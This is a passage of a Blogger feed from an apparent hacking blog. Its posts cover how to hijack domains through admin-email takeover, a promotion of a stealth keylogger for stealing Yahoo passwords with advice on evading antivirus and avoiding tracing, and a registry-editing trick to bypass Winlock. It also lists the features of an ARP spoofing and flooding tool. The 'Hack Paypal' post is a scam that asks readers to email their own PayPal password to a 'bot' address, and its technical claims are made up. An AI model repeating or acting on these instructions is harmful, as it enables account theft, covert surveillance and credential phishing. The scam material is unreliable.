width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5858942339266425501</id><published>2010-03-30T04:13:00.000-07:00</published><updated>2010-03-30T04:14:52.979-07:00</updated><title type='text'>Domain Hijacking – How to Hijack a Domain</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/S7HdJLvZ_CI/AAAAAAAAAWg/YlBMdUbnL8U/s1600/domain_hijacking.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 354px; height: 237px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/S7HdJLvZ_CI/AAAAAAAAAWg/YlBMdUbnL8U/s400/domain_hijacking.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5454383773562567714" /&gt;&lt;/a&gt;&lt;br /&gt;In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.&lt;br /&gt;&lt;br /&gt;Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before &lt;span class="fullpost"&gt;we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).&lt;br /&gt;&lt;br /&gt;The operation of domain name is as follows&lt;br /&gt;&lt;br /&gt;Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.&lt;br /&gt;&lt;br /&gt;1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. &lt;br /&gt;&lt;br /&gt;2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.&lt;br /&gt;&lt;br /&gt;For a clear understanding let me take up a small example.&lt;br /&gt;&lt;br /&gt;John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.&lt;br /&gt;&lt;br /&gt;What happens when a domain is hijacked&lt;br /&gt;&lt;br /&gt;Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.&lt;br /&gt;&lt;br /&gt;For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).&lt;br /&gt;&lt;br /&gt;In this case the John’s domain name (abc.com) is said to be hijacked.&lt;br /&gt;&lt;br /&gt;How the domain names are hijacked&lt;br /&gt;&lt;br /&gt;To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients&lt;br /&gt;&lt;br /&gt;1. The domain registrar name for the target domain.&lt;br /&gt;&lt;br /&gt;2. The administrative email address associated with the target domain. &lt;br /&gt;&lt;br /&gt;These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.&lt;br /&gt;&lt;br /&gt;To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.&lt;br /&gt;&lt;br /&gt;The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.&lt;br /&gt;&lt;br /&gt;Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.&lt;br /&gt;&lt;br /&gt;How to protect the domain name from being hijacked&lt;br /&gt;&lt;br /&gt;The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5858942339266425501?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5858942339266425501/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/03/domain-hijacking-how-to-hijack-domain.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5858942339266425501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5858942339266425501'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/03/domain-hijacking-how-to-hijack-domain.html' title='Domain Hijacking – How to Hijack a Domain'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/S7HdJLvZ_CI/AAAAAAAAAWg/YlBMdUbnL8U/s72-c/domain_hijacking.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5140950905810469554</id><published>2010-03-30T04:09:00.000-07:00</published><updated>2010-03-30T04:12:38.507-07:00</updated><title type='text'>How to Hack a Yahoo Password</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S7HcoOoTrJI/AAAAAAAAAWY/IbEHX_y2fMk/s1600/w.jpeg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 120px; height: 84px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S7HcoOoTrJI/AAAAAAAAAWY/IbEHX_y2fMk/s400/w.jpeg" border="0" alt=""id="BLOGGER_PHOTO_ID_5454383207402417298" /&gt;&lt;/a&gt;&lt;br /&gt;Everyday I get a lot of emails from people asking how to hack a Yahoo password? So if you’re curious to know how to hack Yahoo then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password. &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Is it possible to hack Yahoo?&lt;br /&gt;&lt;br /&gt;Yes! As a matter of fact it’s possible to hack almost any email password. But before you learn the real ways to hack Yahoo password, the following are the things you should be aware of.&lt;br /&gt;&lt;br /&gt;1. There is no ready made software or program that can &lt;span class="fullpost"&gt;hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell such Yahoo password hacking software then it’s 100% scam.&lt;br /&gt;&lt;br /&gt;2. Never trust any Hacking Service that claims to hack Yahoo password just for $100 or $200. All the hacking services are scams.&lt;br /&gt;&lt;br /&gt;3. With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack Yahoo password: They are Keylogging and Phishing. All the other password hacking methods are simply scam or don’t work! The following are the only 2 working and foolproof methods to hack Yahoo password.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;1. EASIEST WAY TO HACK YAHOO&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Using keylogger is the easiest way to hack a Yahoo password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking Yahoo password.&lt;br /&gt;SniperSpy&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;How can I use SniperSpy for hacking Yahoo?&lt;br /&gt;&lt;br /&gt;You can hack Yahoo password using SniperSpy as follows:&lt;br /&gt;&lt;br /&gt;1. After you purchase it, you’ll be able to create the installation module. You need to email this module to the remote user as an attachment.&lt;br /&gt;&lt;br /&gt;2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.&lt;br /&gt;&lt;br /&gt;3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password. In this way you can hack Yahoo or any email using sniperspy.&lt;br /&gt;&lt;br /&gt;The working of Winspy is almost same as Sniperspy.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;I don’t have physical access to the target computer, can I still use sniperspy?&lt;br /&gt;&lt;br /&gt;Yes you can still use it for hacking Yahoo. Because it offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Once I install sniperspy can the victim come to know about it’s presence?&lt;br /&gt;&lt;br /&gt;No. The victim will never come to know about it’s presence on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Can I be traced back if I install it on some other computer?&lt;br /&gt;&lt;br /&gt;No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;What if the antivirus block from sending it as an email attachment?&lt;br /&gt;&lt;br /&gt;Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically. &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;How safe is to use SniperSpy?&lt;br /&gt;&lt;br /&gt;Sniperspy is completely safe to use since all the customer databases remain confidential and private. They doesn’t collect any information from your system and will not contact you in any way unless you request assistance.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Is my online order 100% Safe and Secure?&lt;br /&gt;&lt;br /&gt;Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;So what are you waiting for? If you’re really serious to hack a Yahoo password then go grab Sniperspy now. Click on the following link to visit the Sniperspy site.&lt;br /&gt;SniperSpy&lt;br /&gt;&lt;br /&gt;NOTE: For more details on keylogger read my post How to use Keyloggers&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;2. OTHER WAYS TO HACK YAHOO&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.&lt;br /&gt;&lt;br /&gt;However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo password since it’s the easiest way.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5140950905810469554?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5140950905810469554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-hack-yahoo-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5140950905810469554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5140950905810469554'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-hack-yahoo-password.html' title='How to Hack a Yahoo Password'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/S7HcoOoTrJI/AAAAAAAAAWY/IbEHX_y2fMk/s72-c/w.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-6869760974417814341</id><published>2010-02-10T18:37:00.000-08:00</published><updated>2010-02-10T18:38:01.625-08:00</updated><title type='text'>Hack Paypal</title><content type='html'>This is how to hack the paypal accounts hurry before it's to late and paypal chanes the bots again.&lt;br /&gt;This is the new bot and everything you need to know to get into paypal. My buddy who works for paypal told me about the new bots and all so yah &lt;br /&gt;This is my home adress and my name so if it doosen't work you can come kick my ass all around the world if you want but &lt;span class="fullpost"&gt;remember that it might not work the first time so try it a few times and hopfully it will work.&lt;br /&gt;Charles elrik&lt;br /&gt;5300 old highway rd&lt;br /&gt;Honolulu,HI 96818&lt;br /&gt;our just want to send me fan mail yah.&lt;br /&gt;HOW TO HACK INTO PAYPAL ACCOUNT!!!&lt;br /&gt;(Hotmail accounts for paypal accounts This is from october 22, 2005)&lt;br /&gt;&lt;br /&gt;1) The following complete hacking tutorial contains materials that may not be suitable for irresponsible internet users, reader discretion is advised!&lt;br /&gt;we have to put that so we don't get i trouble.&lt;br /&gt;2) The hacking method is based on a secretly discovered security flaw in the PayPal (www.paypal.com) mailing address confirmation system. It will only work BEFORE PayPal discovers this serious security flaw and fixes it. Take your action FAST!&lt;br /&gt;3) This method works for any body with PayPal accounts with CONFIRMED MAILING ADDRESSES. It will never work for PayPal user without a confirmed mailing address.&lt;br /&gt;4) By strictly following instructions in the following tutorial, you'll gain unlimited access to various PayPal accounts with confirmed mailing addresses. Use those accounts AT YOUR OWN RISK. You?re responsible for your action!&lt;br /&gt;5) When you use PayPal, NEVER log on to sites that do not start EXACTLY with www.paypal.com even if it contains the term ?paypal? in it.&lt;br /&gt;&lt;br /&gt;PayPal is the latest victim of internet hackers. Despite the company?s seemingly perfect security system, a serious security flaw in the ADDRESS CONFIRMATION PROCESS of PayPal?s members? accounts has been discovered by a few experienced hackers from Russia. The hacking process has been simplified a while ago and it was revealed on a Russian language hacking website.&lt;br /&gt;PayPal was immediately alerted of this security flaw after the Russian language hacking tutorial was published on the website, but in order to prevent its customers from losing trust in internet banking, PayPal chose NOT to alert its customers of this security flaw and has then secretly BANNED numerous online articles that contained information of this security flaw.&lt;br /&gt;However, it has been confirmed that due to technical difficulty, PayPal has NOT yet fixed the problem and at this moment right now, anyone can STILL hack into a great number of PayPal accounts with confirmed addresses.&lt;br /&gt;To inform users worldwide of this problem, I?ve attached an English version of the hacking process. Remember, to get the whole thing to work, you MUST&lt;br /&gt;STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!&lt;br /&gt;&lt;br /&gt;HACKING PROCESS:&lt;br /&gt;Every PayPal member is identified by his/her Email and the majority of the PayPal members use Hotmail. After completion of the mailing address confirmation process, usually by adding a CREDIT CARD, PayPal automatically sends the user?s address confirmation info to a mailerbot associated with the user?s Email, in most cases, it?s Hotmail mailerbot.&lt;br /&gt;The security flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots can be confused by a random user and sends out information saved on its server to that user.&lt;br /&gt;To get PayPal account information of numerous random PayPal users from a Hotmail mailerbot, you have to do the following:&lt;br /&gt;&lt;br /&gt;1) Log into your www.paypal.com homepage, and click on ?Profile?, and then click on&lt;br /&gt;?Street Address? under ?Account Information?.&lt;br /&gt;&lt;br /&gt;2) Find the Address whose status is ?Home?, and if it says ?confirmed?, then please read on.&lt;br /&gt;&lt;br /&gt;Basically, A Confirmed Address is any address at which you receive your credit card statement. If you receive a credit card bill at this address, you can confirm it by entering your credit card information. This information will only be used to confirm your address. Your card will not be charged by PayPal.&lt;br /&gt;&lt;br /&gt;So, if your Home address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ON PAYPAL AND ADD A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.&lt;br /&gt;&lt;br /&gt;3) Okay, There are two bots which this will work for.&lt;br /&gt;I. If you want an account with hotmail email, then:&lt;br /&gt;Log in to your paypal email account and send an Email to:&lt;br /&gt;paypalresponsebot035@hotmail.com (This is the hotmail mailerbot described above) (NEW) (Other mailer bots are not active now)&lt;br /&gt;&lt;br /&gt;In the subject line, write:&lt;br /&gt;789bot4*5%8verif-0e24 (To confuse the hotmail mailerbot)&lt;br /&gt;&lt;br /&gt;In the email body, please write exactly 11 lines, which MUST BE as follows:&lt;br /&gt;In line 1:Subject-Type: ?text/plain="+1"?&lt;br /&gt;&lt;br /&gt;In line 2: charset=us-english &lt;br /&gt;(To make the reply readable in your language so put you own language here otherwise it might come in a laguage you don't understand)&lt;br /&gt;&lt;br /&gt;In line 3: botbody*78#9 confirmation0e24.hotmail.com&lt;br /&gt;(To confuse the mailerbot)&lt;br /&gt;&lt;br /&gt;In line 4: p38ylec00rm::s%%(a href=http://www.paypal.com%%)&lt;br /&gt;(To make the mailerbot start retrieving information acquired from PayPal.)&lt;br /&gt;&lt;br /&gt;In line 5: Your primary email at paypal&lt;br /&gt;(To retrieve information from PayPal, The mailerbot now needs an Email which is the primary Email of a PayPal account with a confirmed mailing address, you have to use your own Email as a bait Email and you?ll need to receive info of other accounts from this Email too, so be sure this is your primary Email at PayPal.)&lt;br /&gt;&lt;br /&gt;In line 6: start (retrieve &gt; 07)&lt;br /&gt;(To activate the mailerbot's retrieval function at the highest speed)&lt;br /&gt;&lt;br /&gt;In line 7: verify#8% (*value= = float)&lt;br /&gt;(This will trick him to send it to your email adress instead of the administrators)&lt;br /&gt;&lt;br /&gt;In line 8: Your PayPal password&lt;br /&gt;(Now you have to enter your paypal password to confuse the bot so it thinks your the administrator of paypal and it can send you the emails and passwords of people.)&lt;br /&gt;&lt;br /&gt;In line 9: #searchppagend72hrlog&lt;br /&gt;(to get info from PayPal members who had their addresses confirmed in the last 72 hours)&lt;br /&gt;&lt;br /&gt;In line 10 send#%*idR20334-tsa-0583&lt;br /&gt;(This will make the mailerbot send all the info to your email)&lt;br /&gt;&lt;br /&gt;In line 11 (#%7*tmbot*="+098")&lt;br /&gt;(this covers you trail so they cant find you. Last step!)&lt;br /&gt;&lt;br /&gt;If you specifically follow the instructions above, you'll have email, passwords and all sorts of information of PayPal users who had their mailing addresses confirmed over the last 72 hours.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-6869760974417814341?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/6869760974417814341/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/02/hack-paypal.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6869760974417814341'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6869760974417814341'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/02/hack-paypal.html' title='Hack Paypal'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5025803990610438382</id><published>2010-01-30T02:01:00.000-08:00</published><updated>2010-01-30T02:02:56.427-08:00</updated><title type='text'>Winlock-unlock-hack</title><content type='html'>What if we are in protecting your computer using winlock&lt;br /&gt;simply use the following source&lt;br /&gt;&lt;br /&gt;Version]&lt;br /&gt;Signature = "$ Chicago $"&lt;br /&gt;Provider = topengdigital&lt;br /&gt;&lt;br /&gt;[DefaultInstall]&lt;br /&gt;DelReg = del&lt;br /&gt;&lt;br /&gt;[del]&lt;br /&gt;HKCR, CLSID \ (D1A17367-PRT8-4546-6A19-11OO4FFI823O) \ PROGID, ID&lt;br /&gt;HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr&lt;br /&gt;---------------------------------&lt;br /&gt;save in notepad with the &lt;span class="fullpost"&gt;&lt;br /&gt;name jebol.inf, then right-click jebol.inf&lt;br /&gt;press install.&lt;br /&gt;then ctrl + Alt + del (taskmanager raises)&lt;br /&gt;winlock.exe looking at the process and in endtask&lt;br /&gt;when you finish, start again winlock&lt;br /&gt;press F11, please change password in accordance with our wishes&lt;br /&gt;then change all the disabled (or leave) because we&lt;br /&gt;you've hold the password.&lt;br /&gt;I've tried versions of the results wrong 4:51&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5025803990610438382?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5025803990610438382/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/01/winlock-unlock-hack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5025803990610438382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5025803990610438382'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/01/winlock-unlock-hack.html' title='Winlock-unlock-hack'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5825794510176879562</id><published>2009-12-31T11:46:00.000-08:00</published><updated>2009-12-31T11:50:56.774-08:00</updated><title type='text'>LAN Attacker 2009 V3.5</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sz0AhCxex1I/AAAAAAAAAU4/JHkub75MKsY/s1600-h/noyr6r.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 280px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sz0AhCxex1I/AAAAAAAAAU4/JHkub75MKsY/s400/noyr6r.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5421490094104037202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;100 % Clean, tested By NOD 32, Kaspersky and McAfee Antivirus&lt;br /&gt;LAN Attacker (Standalone no need installation) is a program that can scan,attack,detect and protect computers on local area network.&lt;br /&gt;&lt;br /&gt;The features as following:&lt;br /&gt;&lt;br /&gt;1.1 Scan&lt;br /&gt;&lt;br /&gt;-. It can scan and show the active hosts &lt;br /&gt;&lt;span class="fullpost"&gt;on the LAN within a very short time (~2-3 seconds).&lt;br /&gt;&lt;br /&gt;It has two scan mode, one is normal scanning, the other is antisniff scanning. The later is to find who is sniffing on the lan.&lt;br /&gt;&lt;br /&gt;-. It can save and load computer list file.&lt;br /&gt;&lt;br /&gt;-. It can scan the Lan regularly for new computer list.&lt;br /&gt;&lt;br /&gt;-. It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender’s address of arp request packets without scanning the lan.&lt;br /&gt;&lt;br /&gt;-. It can perform advanced scanning when you open advanced scanning dialg on menu.&lt;br /&gt;&lt;br /&gt;-. It can scan a B class ip range in advanced scan dialg.&lt;br /&gt;&lt;br /&gt;-. It can scan acthost listed in event listview.&lt;br /&gt;&lt;br /&gt;1.2 Attack&lt;br /&gt;&lt;br /&gt;-. It can pull and collect all the packets on the LAN.&lt;br /&gt;&lt;br /&gt;-. It can perform six attacking actions as following:&lt;br /&gt;&lt;br /&gt;(1) Arp Flood – Send ip conflict packets to target computers as fast as possible, if you send too much, the target computers will down. &lt;br /&gt;&lt;br /&gt;(2) BanGateway – Tell the gateway a wrong mac address of target computers, so the targets can’t receive packet from the internet. This attack is to forbid the targets access the internet.&lt;br /&gt;&lt;br /&gt;(3) IPConflict – Like Arp Flood, send ip conflict packets to target computers regularly, maybe the users can’t work because of regular ip conflict message. what’s more, the targets can’t access the lan.&lt;br /&gt;&lt;br /&gt;(4) SniffGateway – Spoof the targets and the gateway, you can use sniffer to collect packets between them.&lt;br /&gt;&lt;br /&gt;(5) SniffHosts – Spoof among two or above targets, you can use sniffer to collect packets among all of them. (dangerous!!!!)&lt;br /&gt;&lt;br /&gt;(6) SniffLan – Just like SniffGateway, the difference is that SniffLan sends broadcast arp packets to tell all computers on the lan that this host is just the gateway, So you can sniff all the data between all hosts with the gateway.(dangerous!!!!!!!!!!!!!!)&lt;br /&gt;&lt;br /&gt;-. While spoofing ARP tables, it can act as another gateway (or ip-forwarder) without other users’ recognition on the LAN.&lt;br /&gt;&lt;br /&gt;-. It can collect and forward packets through WinArpAttacker’s ipforward function, you had best check disable system ipforward function because WinArpAttacker can do well.&lt;br /&gt;&lt;br /&gt;-. All data sniffed by spoofing and forwarded by WinArpAttacker ipforward function will be counted, as you can see on main interface.&lt;br /&gt;&lt;br /&gt;-. As your wish, the arp table is recovered automatically in a little time (about 5 seconds). Your also can select not to recover.&lt;br /&gt;&lt;br /&gt;1.3 Detect&lt;br /&gt;&lt;br /&gt;-. What is the most important function, it can detect almost all attacking actions metioned as above as well as host status. the event WinArpAttacker can detect is listed as following:&lt;br /&gt;&lt;br /&gt;SrcMac_Mismath – Host sent an arp packet, its src_mac doesn’t match,so the packet will be ignored.&lt;br /&gt;&lt;br /&gt;DstMac_Mismath – Host recv an arp packet, its dst_mac doesn’t match,so the packet will be ignored.&lt;br /&gt;&lt;br /&gt;Arp_Scan – Host is scanning the lan by arp request for a hosts list.&lt;br /&gt;&lt;br /&gt;Arp_Antisniff_Scan – Host is scanning the lan for sniffing host,thus the scanner can know who is sniffing.&lt;br /&gt;&lt;br /&gt;Host_Online – Host is online now.&lt;br /&gt;&lt;br /&gt;Host_Modify_IP – Host modified its ip to or added a new IP.&lt;br /&gt;&lt;br /&gt;Host_Modify_MAC – Host modified its mac address.&lt;br /&gt;&lt;br /&gt;New_Host – New gost was found.&lt;br /&gt;&lt;br /&gt;Host_Add_IP – Host added a new ip address.&lt;br /&gt;&lt;br /&gt;Multi_IP_Host – Host has multi-ip addresses.&lt;br /&gt;&lt;br /&gt;Multi_Mac_Host – Host has multi-mac addresses.&lt;br /&gt;&lt;br /&gt;Attack_Flood – Host sends a lot of arp packets to another host ,so the target computer maybe slow down.&lt;br /&gt;&lt;br /&gt;Attack_Spoof – Host sends special arp packets to sniff the data two targets , so the victims’ data exposed.&lt;br /&gt;&lt;br /&gt;Attack_Spoof_Lan – Host lets all host on the lan believe that it’s just a gateway, so the intruder can sniff all hosts’ data to the real gateway.&lt;br /&gt;&lt;br /&gt;Attack_Spoof_Ban_Access – Host told host that host has a inexist mac,so the targets can’t communicate with each other.&lt;br /&gt;&lt;br /&gt;Attack_Spoof_Ban_Access_GW – Host told host that the gateway has a inexist mac, so the target can’t access the internet through the gateway.&lt;br /&gt;&lt;br /&gt;Attack_Spoof_Ban_Access_Lan – Host broadcast host’s mac as a inexist mac, so the target can’t communicate with all hosts on the lan.&lt;br /&gt;&lt;br /&gt;Attack_IP_Conflict – Host found another host has same ip as its, so the target would be disturbed by ip conflict messages.&lt;br /&gt;&lt;br /&gt;Local_Arp_Entry_Change – now WinArpAttacker can watch local arp entry, when a host’s mac address in local arp table is changed, WinArpAttacker can report.&lt;br /&gt;&lt;br /&gt;Local_Arp_Entry_Add – When a mac address of a host is added to local arp table, WinArpAttacker can report.&lt;br /&gt;&lt;br /&gt;-. It can explain each event which WinArpAttacker detected.&lt;br /&gt;&lt;br /&gt;-. It can save events to file.&lt;br /&gt;&lt;br /&gt;1.4 Protect&lt;br 